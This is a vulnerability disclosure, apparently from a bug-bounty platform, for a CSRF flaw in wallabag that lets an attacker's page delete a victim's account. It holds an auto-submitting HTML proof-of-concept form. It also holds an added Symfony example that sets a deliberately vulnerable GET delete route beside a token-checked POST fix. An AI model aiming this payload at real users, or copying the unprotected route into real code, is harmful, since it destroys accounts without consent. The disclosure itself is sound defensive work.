CSRF leading to delete account in wallabag/wallabag
Jan 4th 2023
wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete user accounts via
Proof of Concept
- Create a new user.
- Login as the new user.
- Open the following HTML file in the browser.
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the browser sends a plain GET with the
         victim's wallabag session cookie attached -->
    <form action="http://localhost:8000/account/delete">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the first (and only) form as soon as the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>
```
This vulnerability is capable of tricking a user into deleting their own account.
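The root cause in the PoC above is a state-changing endpoint reachable with a bare GET and nothing that proves the request originated from wallabag's own UI. The following is an added example written for this page, not wallabag's code or its actual fix: a Symfony controller with the vulnerable pattern beside a hardened handler that accepts only POST and verifies a per-session CSRF token. The route paths and names, the token id `delete-account`, the template path and the redirect target are assumptions made for the example.

```php
<?php
// Added example, not wallabag's own code: a Symfony controller that shows the
// vulnerable pattern behind the PoC (account deletion on a plain GET with no
// token) beside a hardened handler. Route paths, route names, the token id
// 'delete-account', the template path and the redirect target are assumptions.

namespace App\Controller;

use Doctrine\ORM\EntityManagerInterface;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;

class AccountController extends AbstractController
{
    public function __construct(private EntityManagerInterface $em)
    {
    }

    // Vulnerable: any GET to this URL deletes whoever is logged in. The browser
    // attaches the session cookie to a cross-site form submission or <img src>,
    // so an attacker's page can trigger it without knowing anything secret.
    #[Route('/account/delete-vulnerable', name: 'account_delete_vulnerable', methods: ['GET'])]
    public function deleteVulnerable(Request $request): Response
    {
        $this->removeCurrentUser($request);
        return $this->redirectToRoute('homepage');
    }

    // Hardened: POST only, and the body must carry a CSRF token that Symfony
    // issued for this session and this action id. An attacker's origin cannot
    // read the token out of the victim's page, so it cannot forge the request.
    #[Route('/account/delete', name: 'account_delete', methods: ['POST'])]
    public function delete(Request $request): Response
    {
        $token = (string) $request->request->get('_token', '');
        if (!$this->isCsrfTokenValid('delete-account', $token)) {
            throw $this->createAccessDeniedException('Invalid CSRF token.');
        }
        $this->removeCurrentUser($request);
        return $this->redirectToRoute('homepage');
    }

    private function removeCurrentUser(Request $request): void
    {
        $user = $this->getUser();
        if (null === $user) {
            throw $this->createAccessDeniedException();
        }
        $this->em->remove($user);
        $this->em->flush();
        // Drop the session so the deleted account cannot keep acting.
        $request->getSession()->invalidate();
    }
}

/*
Twig template that renders the hardened form (assumed path
templates/account/delete.html.twig). csrf_token() mints a token bound to the
current session for the 'delete-account' id; the controller above checks it.

<form method="post" action="{{ path('account_delete') }}">
    <input type="hidden" name="_token" value="{{ csrf_token('delete-account') }}">
    <button type="submit">Delete my account</button>
</form>
*/
```

Against the hardened route the PoC's GET is rejected with 405 before any handler runs, and a cross-site POST without the hidden `_token` field is rejected with 403. Marking the session cookie `SameSite=Lax` is worth adding as defence in depth, but it is not a substitute for the token: Lax still sends cookies on top-level GET navigations, which is exactly the kind of request the original form-based PoC makes.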
Jérémy Benoist validated this vulnerability a month ago
bAu has been awarded the disclosure bounty
Jérémy Benoist marked this as fixed in 2.5.4 with commit 268372 a month ago
This vulnerability has been assigned a CVE
A wallabag/wallabag maintainer gave praise a month ago